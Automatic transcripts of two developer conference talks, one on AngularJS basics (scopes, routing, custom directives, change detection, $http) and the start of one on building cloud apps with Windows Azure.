We might be off in the weeds right now, but we'll circle back to real stuff. This is the kind of stuff that you might run into that just seems very confusing at first. And the same thing happens here. This is the inner controller. So it now has its own scope with its own name property. It's completely dissociated from those other two. So at the risk of doing something very odd now, let me just show you how this is slightly different. If I say root scope has a person object that is an object that has a name property. And let's see how this is different. So instead of root scope.name, I have root scope.person.name. And I do have to change my data binding expressions a little bit. So these can be very rich. You can have greater than and less than comparisons and work with arrays and regular expressions. It's not a full, it's not the complete JavaScript language inside of here. It's just a subset that Angular knows how to parse and evaluate. But this is person.name and this is now person.name. And let me see if I can just copy and paste those so I don't have to type too much. So person.name, person.name, ctrl-k, ctrl-d. All right, same situation, but instead of going to the name property, we go to person.name. And now, when I refresh, if I come into this innermost controller, it controls everything. So if you can understand what's happening behind the scenes there, then you'll be perfectly prepared to work with Angular. But essentially, when I type inside of here, Angular is saying, oh, I need to update person.name. So go to this scope, find the person property, which isn't here. It's not here. It's in the application. Find that person property, get that object, and set the name. So now we are setting stuff in root scope. Pretty fascinating, isn't it? Just want to make you aware of scope and how they inherit and how they work in relationships like this. All right, but that's kind of enough weird stuff about Angular. I think what I wanted to show you next was something a little more realistic. These are my notes, which is, oh, yes. So typically, this is not the type of thing that people write. Typically, we're trying to build a single-page application. So we will, once I have valid HTML, include a new directive, which is data-ng-view. So this directive tells Angular that here's a DOM element where you can load the current view that should be in effect. I have two views defined in this application. Well, I have the markup defined. I don't have them loaded in yet. But if I refresh right now after I save this, refresh, there's nothing on that page, but I have numbers and I have movies. Nothing displays. What I need to do with Angular is tell it that when someone comes to hash slash numbers, load the numbers view into there, when someone comes to hash slash movies, pretend that said movies, load the movies view. So to do that, we need to add some configuration to our application. So I'm going to write a config function that is a function that takes another Angular service known as the route provider. And without route provider, I can say when someone comes to slash numbers, what I want you to do is load my email. Now, load views. I think I called it numbers.html. And you can also specify a controller. So you could wire up the controller right here. But basically, I'm saying come to this URL, go out, grab this HTML, put it into that DOM element where I had the ng view defined. And I could do the same thing with movies. So when someone comes to movies, please go to this template URL, which is views movies.html. And I can also say otherwise, if there are some strange URL that you don't recognize, please just redirect them to numbers. I think that's right. And then I have to register this config function. I should also annotate it, decorate it so that we tell everyone that it needs a route provider. But I'm not minifying right now. So let me just do an app.config. Here's a configuration function to execute when you load this module up. Let me see if any of this works. Do a save all, refresh this page. Yeah. So there's numbers. There's movies. We're going to have to fill in the code for these pages to work. And if someone comes to blah, it redirects to numbers. So that seems to work good. And of course, the advantage to this is Angular manages the browser history. So as people are navigating between things and you hit the back button, they actually go back to the previous view and things like that. Oh, and so one thing it's not doing right now is it's kind of an abrupt transition between these two. What they added fairly recently in Angular is the ability to kick off animations when certain things happen. So that looks something like data ng animate equals. And then it's like passing an JSON object. When this view raises the enter event, I want you to run the animation view enter. And I think that has to be in single quotes, but we'll find out. Let me see if this works. Refresh. Yeah. So when I go to movies, it sort of glides in. Numbers glides in. Very good, right? You could just do that all day. I'm not a UI person. So how does this work? View enter. One of the great things about Angular animations is on CSS3 capable browsers, you can just use, here we go, CSS3 animation. So view enter is going to be a class that Angular applies that we're going to transition everything. We're going to start it off invisible to the left a little bit. And when that thing becomes active, it will be in the proper position and it will be completely opaque. But it will do it with this easing function specified by Bayesian curve with those points. So you can find lots of examples on that. ng animate. All right. So here's what we have to do. We have our views loading. And that's sort of one way to break down a complex application into smaller pieces, right? I'll put things inside of different views. Then inside of a view itself, let me load up one of these views. Let's load up the numbers view. Inside of one of these views, you can also encapsulate some HTML. Let me format this up a little bit. Eventually we're going to have some numbers in here. We're going to handle a click event. What I want to do right for this moment is just show you that you can do a div with another directive ng include to say what I want you to do is go out and inside of this div load up views. I think I called it greeting.html. Let's look at that file real quick. So what I'm telling Angular is for this div, there's actually a partial view out there called underscore greeting.html. Please load that up. Stick it into the page here. That view, partial view, can use data binding expressions to get evaluated against the scope of your controller. So it should display person.name. If I refresh all this, so we get hello.app. That's another way to sort of break things down. But I want to talk about something else, something that's very powerful in Angular, something where you can build a custom directive. So instead of ng including a directive, what I would like to do is build something where I can say div migrating and have it figure out how to display a name or something like that on the page. So in order for this to work, I'm going to have to define something that is registered with Angular so it knows how to display migrating. So we'll come back into our script. Let me just do a couple other things. Let's actually remove person from up here. Because typically people don't want to mess with root scope too much. You put something in root scope since all the other scopes inherit from it. It's almost like a global object. It's almost like the global namespace. We'll just keep that in the numbers controller where it's just scope and put something more reasonable here. There we go. So let me write a custom directive. Again, I'll put it in its own little function here. Copying, pasting to avoid typing so much. Always a clue that you could do something better. But migrating is going to be a function that ultimately I have to register with this module. So here's a custom directive called migrating that when someone uses that, call this function. And so there's a bit of a naming convention here. When you camel case something in JavaScript, like migrating with no dashes in the capital G, that's what Angular goes looking for when it sees my dash greeting. That's how this things work. And if you look in that Angular source code, Angular.js, there'll be a directive in there with a function ngClick, not ng-click. So it sees data-migrating. It'll go looking for directives, migrating, like this. And what we can do from here is we return an object where you can set a number of different properties to influence how this directive is going to behave. So today, we only have so much time, I'll be able to show you about 20% of what's possible with directives. They're extremely powerful. I'll just show you a subset of things that can be done. I just want you to know there's a lot more that could be done. One thing you could do is still use a template URL. So I could say when someone's using that directive, go out to the views and load up greeting.html. And if I did everything correctly here and refresh, yes. Then we just load that up and it says hello, Scott. But if that's all you're going to do, you might as well just use ngInclude, right? Just include the partial view. So we'll do something a little more advanced. Oh, but before I do that, there's a couple different syntaxes that you can use for these directives. This is the attribute syntax. This would be the class syntax. Angular can actually look inside of a class and say, oh, I know what my greeting is. You must want a directive there. And you can also do custom HTML elements, like my greeting. Some people don't like that because HTML5 validators won't like it. Let's just see if that works. It doesn't work yet because by default, Angular only looks at attributes, I believe. When we register the directive, we would also have to tell it pass in something called restrict, restrict. Make sure I spell it. I want attributes and elements. So we have two of those. I want attributes, elements, and classes. Now all three of them display. And there's also a way to do it with HTML5, with HTML comments, attributes, elements, classes, and comments. But I really just need one thing here. So let me let's go back to just using that one. And let's get rid of the template URL. We want to do something a little more powerful. I'm going to provide a link function. So a link function, link, is a function that Angular will invoke when it's recognized that directive, when it's gotten the reference to that DOM element. It will take that DOM element, pass it to your link function, along with a scope, and the element, and the attributes that are on that element. So one thing I could do here is say element.text. Hello. Just to make sure this is working. Uh-oh. That's supposed to be a semi-whole. Did I switch languages? There we go. All right. We got hello. So that's not very interesting. What I want to be able to do is say element.text equals some sort of expression that you give me in the directives that I know what you're trying to set. So let me say, I want to say hello in someone's name. But you have to tell me the object that has the name property. So I could say data-migrating person, right? The person that's on the scope. Data-migrating person. And so one crude way to do this would be to say, okay, the name I want to display is equal to scope. So the scope object will have, that'll be my scope with the model inside of it. I want to get to attributes.migrating. Yes, migrating. All right. Index into the scope using migrating. So what is the value of this? Attributes will literally contain all of the attributes that were on that DOM element. So if I ask for attributes, migrating, that should give me person. And once I have a reference to that object, I should be able to say name. And now I should be able to say hello plus name. Let's see if that works. Oops, let's see what did I miss? Cannot read name undefined. That is because, sorry. Yeah, scope. Some attributes.migrating should give me the person. And then we should be able to get my name. Let's see what happens if we put a break point right here. I'm missing something obvious. So if I say scope. Some attributes. I'll blow this up here in a second so we're going to see it. Oh, what is attributes.migrating? So something wasn't set. Oh, because I didn't save numbers.html. Unsaved file. Save it. Cross fingers. Refresh. Run. There we go. Hello, Scott. Is that interesting? Not entirely. What if? So one of the things you want to do with a directive is sort of decouple yourself from the model as much as possible. This directive now is assuming that you're going to give me an object that has a name property. But what if I just want you to give me the name? Just give me an expression that gives me the name that I can then use to set the element.text. Well, then I could say, okay, let's use greeting equals person.name. Save the file. Which I know if I tried to use this syntax using a real expression like that, this is going to break because this will look inside of scope for a property called person.name. It won't look for person and then do a dot name. It'll look for person.name, right, on that object. So trying to run this, we'll probably get back undefined. Let me get rid of that breakpoint. Yeah, undefined. So I need something from Angular that will actually understand what person.name is and give me something that I can evaluate that. Well, fortunately, there's another service in Angular called the parse service. The dependency injector can inject it into the migrating function when it's setting up this directive. So I will need to take that parse service and save it off here and something that gets closed over. So I could say, before we return that object parse equals that parse service. One of the things I can do with parse then is I can say, give me an expression by parsing attributes.migrating. And what I can do with the expression then is invoke it, passing in the scope object. And that should dig the name out for me without me having to figure out if there's dots in that thing or not. So refresh, we're back to hello, Scott, which is good. The problem with this is that hello, Scott is written once when the link function runs. And now if someone is updating that model, that is updating person.name, but my directive is not written in a way that it's recognizing any model changes. That's something else that you need to do from inside of a directive. You have to tell Angular what you actually need to observe or watch so that when it changes, you can update your display accordingly. So actually it turns out to be fairly easy. I can say, dear Angular, I want to watch this expression. And when it changes, you can call this function for me and pass in the new value. I'll talk about this here in a second once I get everything put in place. And let's change this to I am watching something. I think that's right. Not using the expression, but I'm going to leave that there because we might need it later. Refresh the page. I am watching Scott. Alan. So now we're updating appropriately. So Angular changed detection a little bit different than some of the other frameworks that are out there. If you use knockout and backbone and some of these other ones, when your model changes, the properties on those model objects have to be observable. They have to essentially raise events that broadcast to the world that, hey, this value just got set. Now someone can go out and update the DOM. Angular works a little bit differently in the sense that my JavaScript can be plain, unobservable objects. So what is person? It's just a regular JavaScript object with a name property. And what Angular will do is when you're using directives like ngModel and these expressions like x plus y, it will set up watches on those properties. And a watcher really is, let's look at the current value. Okay, we see what the current value is. We'll save that off. And now something has happened. Let's check the value again. Oh, it changed. We have to update the screen. So it's very much like snapshot change detection, which does influence some of the applications that you can write with Angular. The rule of thumb that the team came out with is that if you have a model with over a thousand things, a thousand properties, you might start running into performance problems because every one of those thousand things is data bound on the screen somewhere. There's a thousand watchers. There's a thousand comparisons that have to happen when it figures out what's changed. There's ways to optimize around that, but it's just something to be aware of. Someone emailed me recently with a page that had a table with 10,000 rows in it, and they were wondering why performance was slowing to a crawl. It's like, well, you're going to have to come up with a different solution for that one. Making sense? At all? Yeah, maybe? Well, I'm going to forge forward. So a couple of things happening then. Oh, yeah. So we have a directive that I can essentially bind something in my model, have it update the screen. It's two-way data binding. So what I want to do now is say, when someone interacts with this element, I want to actually modify the underlying model value. So with elements, I can bind to events. Now, I said earlier, we don't need jQuery, and that's because Angular actually includes an implementation of what they call jQuery Lite, which is a subset of the jQuery API, but it's all the things that you always use. Add class, remove class, dot bind, hookup events, dot text to set the text, dot HTML, all the stuff that you use for DOM manipulation in jQuery and selecting things. It's already provided by Angular. When you get one of these elements, it's essentially wrapped by jQuery Lite. That being said, if you include the jQuery library before you include Angular.js, it will use jQuery, the full jQuery library. So you'll have all that plus whatever else jQuery is providing. But element dot bind is a way to say, I want to hook up to the click event. So when someone clicks on this, what I want to do is add exclamation points or something at the end of the string just to make it look like it's doing something. So the way I can do that is through this expression, that expression knows how to assign values. So I'm going to say expression dot assign on the scope object, take this value and add an exclamation point. Right? So every time I click, I wanted to add an exclamation point into the model on the scope. So let me refresh the page. There's no errors. I'm going to click on this a few times. It doesn't seem to be updating. There's no errors. That's weird. Let me try to update something else on the screen, like this text box. Huh. Then all of a sudden all of my exclamation points appear. So this is something else to be aware of with Angular. There's two worlds of code when you're writing an Angular application. There's the world where code runs inside of Angular or Angular is aware that the code is running. There's something from Angular on the call stack. And then there's the world where Angular doesn't know that code is executing. This is a case where Angular doesn't know this code is executing because we're just saying, bind to click event. When someone clicks it, we're going to change the model. Angular doesn't know that that executed that it changed something, so it's not going out and doing any change detection. So push that on your mental stack just for a second. We're going to come back to this situation. Before we do, I just want to do a slightly simpler scenario, which is this numbers controller. I have an input for X and input for Y. This will show X plus Y. I want to have a button that when you click on it, it will just double X and double Y. Let's see how to implement that. That's changing the model too, but it's a little bit simpler than what we're doing. So over in the numbers controller, let's initialize some things. Scope.X, let's say it starts off as a 3. Scope.Y started off as 5. Scope.DoubleIt. So I'm saying when someone clicks this button, look for something on the current scope, in the current scope, called DoubleIt, and treat it like a function. So invoke it. So Scope.DoubleIt is a function that when someone invokes that, we will say Scope.X times equals 2. Scope.Y times equals 2. Let's just see if this works. Refresh the page. So we've got a 3 and a 4 and an 8. I can bump these up. That's worked. It's updating the screen. Change X. Double everything. Double X and Y, and that also updated that div out there. So all that works. When you're inside of code that Angular knows it was called, it does the change detection for you and everything just works. It knows that it had to call DoubleIt. And so as soon as your code executed because you wired up something here with an ngClick directive, as soon as you change something inside of that function, Angular will do the change detection, figure out how to update the screen. But if you execute code inside of here without going through Angular, it doesn't know that things change. So if I had an increment function, and I said inside of here we'll do Scope.X plus equals 1 and Scope.Y plus equals 1, and then we do a set timeout. Let's do a set timeout. So every, well, we'll start calling this after one second. And then just to make things a little bit dramatic after every 250 milliseconds we'll keep calling it. Run this. No changes appearing on the screen because set timeout is just calling that code increment function. Angular doesn't know that's happening. If I try to update something on the screen, like change X, oh yeah, I can see something's getting doubled, right? Why was way up there? Angular doesn't know that things are changing. Instead of set timeout, what I should be using is another service in Angular, the timeout service that's basically a wrapper for set timeout. But it's through an Angular service. So again, it's about testability. You could fake that out in a unit test, make sure the controller was calling timeout for some reason. But now if I say let's use the timeout service to invoke that function, well, timeout does a little bit smarter and knows that things might change. And I think I also have to change my injection here. Or using timeout service. Let me refresh. So through the timeout service, things are changing. Angular knows that something was changed when it called that function back. Yeah. Pretty exciting, isn't it? You guys glad you came to the session. All right. Let me take this out so it doesn't become annoying. How do we do that? How do we do that from our own code? Well, when you're writing a directive and you're changing something in the model, you should always do one of two things. Either call apply after that is finished. That's the way of telling Angular, okay, code just executed. Probably made some changes. I need to you to go through and do your digest cycle and see what changed and update the screen appropriately. If you want to do it the really safe way, though, you can also invoke apply and pass in a function of the code that might change the value. The advantage to this being if that code that is changing stuff throws an exception somewhere along the line, Angular will still do its apply change detection stuff. Right. And update the screen. Save this. Refresh. Now let me click my directive. Now you can see it's actually updating appropriately. Right. So that's how you would change the model from a directive. So directives are really that piece of, they're like glue between the DOM and your model. The model for a controller should really never do any DOM manipulation. The model, the things that you put on scope, they're very much, you treat them like a view model if you've ever done silverlight or WPF development. They don't really know about the view. You just set properties on things. You write functions that modify things. And it's the data binding expressions and the directives that take care of pulling data out of there, modifying the DOM, wiring up click events in the DOM. You would never write DOM manipulation code inside of the controller, basically. And that means we should have at least one passing test inside of here. I'm hoping. Yeah, should double it, actually, is a passing test. Let me show you the test real quick. Don't know if we'll have time to cover these in much detail today, but a test for that controller for double it could look as easy as this. I want you to initialize X to 10 and if someone doubles it, I would expect it to be 20 after it's doubled. There's a little bit of setup code to get there. You basically have to instantiate the controller and provide maybe a fake for the timeout service, but they very much want you to be able to unit test your models and controllers. All right. Let's try to get through some material here. We have the numbers view working, I believe. We did the double it. We have the custom director right. So let's look at movies, which is a little more realistic scenario. So what I want to do here is have a movies controller that will, which we don't have yet, a movies controller that will go out and we'll call a web service that sits at slash api slash movies that returns some movie information in JSON. This is showing XML, but that's because I ran it through the browser, but it'll hit that end point, pull back some movies, display them in a table, allow me to edit them, let me save them. We need a movies controller to do that. So function. I need a reference again to angular. I'm going to put this in my app also. That's going to be my module. So my movies controller is a function that will take a scope. That's where I'll put my model. Also going to take another service called the HTTP service. You can write your own custom services, by the way, very easy to write, have them injected in to controllers and directives and other things like that. Typically what people would do, a lot of people wouldn't use dollar sign HTTP service directly from a controller. They would hide it behind their own custom service. There's a number of advantages to that, including caching. And sometimes it's easier to test that way. We're just going to use it right from the controller, just, well, in the interest of time. This is basically like dollar sign.ajax. HTTP has get, put post methods, JSONP method, I'm going to get API movies. It returns a promise. So I can say.then or.always or I believe there's a.air. Then after you have retrieved the movies, call this function with the result. What I want to do is take the data that comes back and put it into my scope. So scope.movies equals result.data. And let's check the view real quick. So the view is building a table. And then this is a big directive that you'll use quite often, the ng repeat directive. It's basically saying find the movies property on the scope. And essentially for each movie that you find in the movie's collection, actually repeat the following DOM elements. So basically, well, repeat these DOM elements. Repeat a table row for each movie that you find. And it sets up a new scope for each, one of those repeated DOM elements, where the movie, the single movie that pulled out is the scope. So when I say things like movie.id, movie.title, movie.release date, it should be pulling that out for each individual movie, putting it into a table cell there. Pretty good stuff, right? See if it works. Refresh this and I didn't save something. Still got an error, which is movies controller is not a function. Oh, right. So I bet I forgot a step. We wrote the movies controller function. I never told Angular about it. So dear module, there is a controller called movies controller. This is the function to use. We should annotate it for dependency injection, but we'll get to that. All right. So we got movies from my web service. Very good. It's very ugly display. What are some things we could do to improve this? Well, we could go into the view. And since I'm using bootstrap, I guess one thing I could do is say this is a table, table, hover, effects. That doesn't really matter. Table striped effects. Slightly better. Release date. Not pretty. How do I modify the release date so it's a pretty value? Here's another category of abstractions in Angular. Things called filters. Filters are things that you can pipe into. So I could say, please pipe this into a filter called date. And that date, I can give it a parameter. I want you to display a date with the year, a four-digit year. And you can also do month, year, whatever type of syntax you want. Do a save all here. Yeah. So we just have a four-digit year. So filters are a nice way of formatting things, keeping that code out of the model, keeping that code out of the controller, not having to change your API or the JSON that comes back. You just pipe things through a filter. They're also very easy to write. They're essentially a function that takes a value. And you modify the value and you return it. What else do we want to do here? We want to edit things. So when I click on the edit button, how do I edit this movie? This is already set up with an ng-click directive that says someone clicks the button, call this function, pass in the current movie that's in scope. So I just need to, in my controller, say scope.edit is a function that takes a movie. And it looks like this editing section, a couple different things going on. So first of all, there's an ng-show directive. That's a really easy way to turn a DOM element on or off. Basically, it looks at this expression on the current scope. And if it's truthy, it'll show it. If it's falsy, there's no DOM element. It'll hide it. So literally, when we're editing, if I say scope.editing equals true, that should turn that view on. Also looks like we are binding now against edit movie. So edit movie.title, edit movie.release date. Let me say scope.edit movie equals that incoming movie that you just passed me. Let's see if this works. I'm going to edit star king. I don't know how I came up with these movie names. They're ridiculous. So I'm editing that JavaScript object. I edit star king over here. That's the same object as what's in the table. So you can see the data binding works to update the table, which might not be what I want. I might want to get a copy of that object so I can modify it and not update the table until users are ready to commit that somehow. So I would probably do something like Angular. There's a copy, a deep copy method helper. Angular.copy that movie. Now I should have a distinct copy of, let's say, Star Wars. So if I make changes over here, they're not going to be propagated over there until I click save. Let's see what the save button does. Save. I was just going to call a function called save and pass in the movie. There's also a cancel, which effectively stops the edit. Let's implement that stuff real quick. So scope.cancel as a function. I guess all I really have to do here is say scope.editing equals false. That should be enough where I should be able to say let's cancel it. Very good. And scope.save, that's a function where you give me the movie that you want to save. Obstensibly, I can do an htdb.put there, put that movie back to the web server, tell it to save it in the database. I probably also want to update the movie that's in the table, which I guess if I had a library like underscore, it would be a little bit easier because I guess the best way to do it right now is to say let's go through the movies that we have in the model. And when we find the movie that has the same id as that incoming movie, that's the one we want to update. So we'll break out of the loop. But here I could do angular.extend, which is a lot like jQuery.extend. Take this object and this object and move all the properties into it. Extends scope.movies sub i with that incoming movie, if I'm making sense. I hope I'm making some sense. Let's try to edit star king. I have no idea if that's really a movie. Star king 2, save it. Uh oh. What did I miss? Movies is not defined. Uh, yeah, that's interesting. Oh, how did that sneak in there? Yeah, yeah, yeah, thank you. Now I see it. Hopefully that's the problem. Save it. Yes, thank you. So that's the, that would be, that would be an example of something that you could do with angular that you'll notice is amazingly easy, right? That's a very complex page. It's showing things, hiding things, putting things on the server, retrieving things from the server. But it's all right here. It's relatively straightforward. It's also not too difficult to unit test. I haven't completely implemented the update movies the way it wants to be implemented. But just to show you some of the tests again. This is an example of, I expect after the movie controller gets instantiated, it should have made a call to the web server to get API movies. And I would expect after all the asynchronous stuff is done that the scope.movies.length, it'll have three movies in there. And I expect if I call scope.edit that it'll turn on the editing flag so that DOM element appears. So lots of interesting ways to write unit tests. And I think, let me just check something real quick. I think I covered 90% of what I wanted to show you today. So I'll just open it up for questions. We only have a couple minutes left. Well, if there's no questions. Ah, so the question is why Angular not knockout. It's a very personal decision, I believe. Some people use knockout and they like it. Some people use knockout and they just doesn't do it for them. I kind of fall into that category. The first time I tried Angular honest to goodness and I looked at their examples and I saw things like ng-click, it turned me off and I disregarded it for about four months and then I came back to it. Actually went through their tutorial. So if you want another good tutorial on Angular, they have on the Angular web page here a link to a tutorial where you bring down the Git repository and you go through different steps that they have tagged and it'll show you how to build an application that has a master detail view. Very interesting. When I went through that, then that's when I said this is the one. It doesn't funkify stuff so you don't have to make your model observable. You don't have to do crazy things to, you know, every property becomes a function. I really like this data binding syntax. I like candle bars or mustaches, whatever you want to call them. I think it has a lot of flexibility with the directives. The downsides to Angular are the documentation is not that good. It is complex. If you haven't worked with inversion of control containers and dependency injectors and an MVVM type pattern before, it can all be quite overwhelming. But I think the simple cases are very simple. They're very easy to do. The hard cases where you have to build custom directives, that requires a little bit of work. So does that answer the question? I like it. So if you have any other questions, my email address is this and you can email me. I can give you the code that I wrote today and I have some Plural Site cards. If you want to watch some Plural Site videos, it's a free monthly subscription. So $30 value. Thank you for coming. Hope you enjoyed it.
|
AngularJS is a JavaScript framework for building applications with HTML. In this session we'll explore the fundamental abstractions of Angular in the context of real application. We'll see how to use controllers, models, services, filters, directives, views, templates, and more.
|
10.5446/51504 (DOI)
|
Thanks everyone for coming to NDC. This is my second time here and really excited to be back and want to thank everyone for coming out this week to the conference. It looks like some great speakers and great content throughout the week. My name is Scott Guthrie. I work at Microsoft on a couple different things, one of which is Windows Azure. What I'm going to do is spend this talk and the next talk kind of walking through a new talk that I've never done before, so I'm pretty excited to give it, which is basically called Building Real World Apps with Windows Azure. It's going to be kind of a patterns-based approach and I'll kind of walk through exactly what I mean just in the next couple slides. That walks through kind of how you build real world cloud-based solutions and the patterns are going to talk about apply to any cloud environment. You can use them with Amazon, you can use them with Google, although I'd really like it if you use them with us. The demos I'm going to walk through are going to be using.NET and Visual Studio and using Windows Azure to kind of show off how these concepts work and hopefully make them really real. How many people here have used Windows Azure? Okay, good. A lot of people have. A few people haven't. If you haven't, don't freak out. I'm going to provide enough context hopefully throughout the talk that, oh yeah, two bottles of water. Thank you. Even if you don't know what Windows Azure is, hopefully you know what it is at a high level, but if you don't know it from a practicality perspective, you'll still be able to kind of benefit and pick up a lot of things here. In terms of, so I'm going to spend 115 slides walking through patterns of cloud computing. I thought I'd just kick it off though first by walking through, first, what are some of the benefits that cloud computing gives you? Every time you want to learn new things, you might ask yourself, why am I learning it? I think ultimately cloud computing is exciting for a number of reasons. One of the reasons is as developers, it just lets us do more. It lets you reach your customers in a deeper way. You can build more engaging experiences. You can do things like mobile. You can use things like analytics to have a much richer customer experience. You can reach other markets with cloud computing because there's data centers around the world. You can very easily expand your business into new geographies. You can deliver things that just weren't possible today. We're going to build a simple solution today and walk through some of the concepts of it. It looks pretty small. It is a relatively small app. The nice thing about the way we're going to build it is if we wanted to build it so that we stored hundreds of terabytes of content with it, we could. If we wanted to build it so that we could run it across a thousand servers, we're going to architect it such that we could. It lets us approach problems that previously were just not practical and are now real. It's going to do it in a way that's cost effective. The app I'm going to build, you can basically develop and test it completely for free. Everything we're going to build, you could do it no cost whatsoever. The nice thing about cloud computing and Windows Azure is you pay only for what you use. As your app grows, as the amount of storage grows from a couple megabytes to a couple gigabytes to a couple terabytes, you're only paying for what you're actually using and you're not having to preallocate a lot of resources, which also, in addition to the technology from a business model perspective, again, enables you to kind of build apps that otherwise you might have a hard time getting your company to approve. Hopefully, you'll see at the end of the day, it's a really rich, flexible, and ultimately very agile environment that as developers ends up being fun. What I'm going to try to do today is walk through what I'm calling common cloud patterns that will help you be successful targeting this environment. Specifically, I'm going to walk through a simple app. I'm calling it Fixit, which is a very simple app, but it shows off a number of these patterns. It shows off data access. It shows off security, including enterprise, single sign-on with Active Directory. It shows off queuing. It shows off, we'll talk about caching, and we'll talk about telemetry and monitoring and logging and a whole bunch more. Specifically, here are the 13 concrete patterns we'll walk through, both this first talk and then the second talk. Using this code as sort of an example, and hopefully, you'll arm you with kind of the knowledge so that if you took the slides, took the code, you could go off and you could build pretty much any type of web or mobile-based application using these patterns and know that when you deploy it and run it, you'll be successful and hopefully have a really agile development environment that lets you kind of reach and build these types of new solutions. These are kind of the patterns we'll walk through. We're going a lot more depth on each of them throughout, and basically we're going to use kind of explain the concept and walk through code and hopefully make it real for each of these. A quick, simple demo of this app that we're going to walk through. Again, it's a pretty small app. It's called Fixit, and I'm not sure if Fixit translates well in Norwegian, but basically think of it as a ticketing system where you can go and you can say, I need something fixed and upload a ticket, and then someone can go ahead and process it and do something with it. So it's not a very complicated app, but the idea is you could go to it, you could log in using a forms authentication and a database, or what I've also wired up is supports that I can do enterprise single sign-on with Active Directory. So what I just did was redirect it to my company's portal, or sorry, company single sign-on. I'll walk through how you do that yourself, I can spell Microsoft correctly. And so basically I just logged in using my company security model. I can say, pick up room. My room is a mess. I'm going to sign it to myself. I'm David, but let's see. Trash, there we go. If I can upload a picture of what I want to get fixed, I can go ahead. I've uploaded it. I could create more tickets if I wanted to. Clean close. Please they smell. Signed it also to Scott. Again I'm logged in as David. And so forth. So that's the progress of the items that I've done. You can see I have a few, one that I've been working on last night. And then basically I'm just going to log off out of this application. And I'm going to log back in this time as me using the integrated off. So no single sign-on here. When I log in now I can see what issues are assigned to me. You can see David assigned to me. I need to clean the close and I can see a picture of my dirty close. And I could say they do. Market fixed to close it out. So again, very simple application. Not a huge in-depth app. But one that is rich, hopefully you can look at and say, yeah, I could build that. And what I'm going to do though is try to show you then how you could build this simple app but incorporate all these patterns as part of it. So that it's not just a simple app from a feature perspective. It might be a simple app from a feature perspective. But we're trying to build it in such a way that we could scale it out so that I could handle millions of users. We're trying to build it in a way that when I actually deploy it, it can be resilient to things like database failures or connection terminations. And I can automate it and have a very agile based workflow so that I could start simple and I can keep iterating on it in a very quick, fast way and make it better and better. And these patterns, again, they're true for any cloud environment. But if you follow them, they can really help you fall into what I call the pit of success when building your cloud apps. So the first pattern I'm going to walk through is, the first couple of patterns I'll walk through actually kind of apply to any project in general. But I think they're especially true in the cloud. And this is sort of the first pattern here is basically automate everything and make sure that as you're building your solution, you kind of try to eliminate as much manual process along the way. And you set yourself up so that you can have a very repeatable agile workflow as you're doing this type of environment. And kind of what, you know, you often hear this term dev ops. You know, this kind of workflow we want to be able to enable and that successful teams that really use the cloud in a deep way do a good job of enabling is this workflow where I can start with an idea. I can write some code. I can deploy it. I can run it in production and get a whole bunch of feedback on it. You know, people like it. Is it being successful? Are we seeing weird errors? And I can iterate very quickly, make changes, make fixes, add more features, get it back in production in a very quick way and just continue that process. You know, some teams deploy multiple times a day into a live production environment. One of the things that we've done on the Windows Azure side, on the team side over the last or 18 months, we went from a flow of we only shipped every couple months to the point where we were also in the mode where we actually update Windows Azure to the live service at least every two or three days with something. And we try to do major feature releases every two to three weeks. And getting into that cadence really enables you to kind of get immediate customer feedback and build out your business in a key way. The important thing though to be able to do that is that you have an environment that's repeatable, that it's reliable, it's predictable, and you can enable what I call low cycle time, which is from the point you have an idea to the point you get feedback and your customers are using it, you know, is as low as possible. And so the first two patterns or two or three patterns I'm going to walk through is just some of the best practices that we recommend for how you go ahead and do this. So the first thing we're going to talk about here is sort of automation. So a number of people mentioned they have used Azure. If you haven't used Azure, you know, one of the things that you've probably noticed when you first sign up for it, and certainly if you watch any of our demos or any of the overview talks that I've given in the past, is the Windows Azure portal, which is our management console that lets you see all of the resources that are deployed on Azure and provide a really easy way for you to go ahead and create and manage anything inside of the cloud environment. It's a great portal. It's, you know, we're very proud of it. I'm going to spend the rest of the talk telling you about why you shouldn't use it. But that's not entirely true. You do want to use it actually, especially in the beginning when you're just getting started. It's a great way to explore. So if I want to create a virtual machine inside Windows Azure, I can just say new compute virtual machine. I could say, what do you want to name this? NDC quiet. So I can basically just, hey, I'm going to add, there I can choose what I want to run this on. If I'm an MSDN customer, so if you're an MSDN subscriber, you actually get a whole bunch of Azure resources for free, up to $150 a month of resources. And so at a heavy discount. So you go ahead and take advantage of it. I can deploy this virtual machine anywhere in the world. We'll do West Europe. And I can also choose from a variety of images. So I could deploy SQL. I could deploy Windows. I could deploy Linux. Go ahead and create. And I'm done. And in basically four minutes, I'm going to have a virtual machine that I can go ahead and log into. This is one I have earlier. And I can basically log into it. And I have a nice virtual machine here that I'm an admin on that I could basically do anything I want within it. So you can see here. Again, if it's Linux environment, I could SSH in. And hopefully the network God's willing. We'll see a remote desktop shortly pop up. And I basically have full access on this machine. So there we go. So this is kind of as easy as it is to kind of create a new virtual machine. I now an admin on this box. I can install anything I want on it and I'm good to go. And so this portal makes it really easy to do that. Portal also makes it really easy so that if you wanted to, you could go ahead and say, create new website. And I could say, let's go ahead and create the Scott Goo NDC web. I can pick again where in the world I want to run it. Let's do a, no, it's not in the US. Let's do it. Sure. I can use this in the subscription. I can go ahead and create this. And what I'll see here is I'm creating a new website. Again, I can choose anywhere in the world that I want to go ahead and run it. And generally with Windows Azure, you can see where the website takes about six seconds to create. I've now got a nice little website that I can do. And if I wanted to, I could then go ahead, individual studio. We could call this Hello World. If I want to deploy this to that website, I could just go ahead and hit publish and use the UI here to basically say, let's deploy into that newly created website we just did. It's got Goo NDC web, hit OK. And I could basically just walk through hitting next, next, next. And in about six seconds or 20 seconds, I'll basically have a website that is deployed and running in the cloud that I just created. So this hopefully is an example of how easy it is to kind of use manual techniques and use the portal and use Visual Studio in order to very quickly get going. And so again, it's great for learning. It's great to kind of get started and definitely encourage you in the early days as you're kind of exploring Azure and just trying out the features. This is sort of a fantastic way to get started. The problem though is if every person on your team is using this kind of manual process in order to create and get going every time you want to deploy a new project or run it, you're going to start to make mistakes. And so again, this is great for getting started. It's great for spiking out an idea. But if you're going to really work on a production cloud application of any size, and especially if you're doing a team environment, my recommendation is do this once, learn it, and then automate it. And that's true for everything that we're going to do throughout this talk. And the great thing about Azure, and it's true mostly about pretty much every cloud environment, is everything that you can do through the portal, everything that you can do by right clicking inside Visual Studio, you can also do by automating in a completely scripted way. And you could write that script using PowerShell, you could use that script using things like Chef and Puppet, which are open source frameworks. You could also do things, you're just using the Bash command line tool inside a Mac or a Linux environment. We have scripting APIs exposed to all those different environments. And definitely worth checking out as you do things. So let's go ahead and create a new project and just sort of illustrate how that would work. What would you like to call this project? Silence. Silent 2. 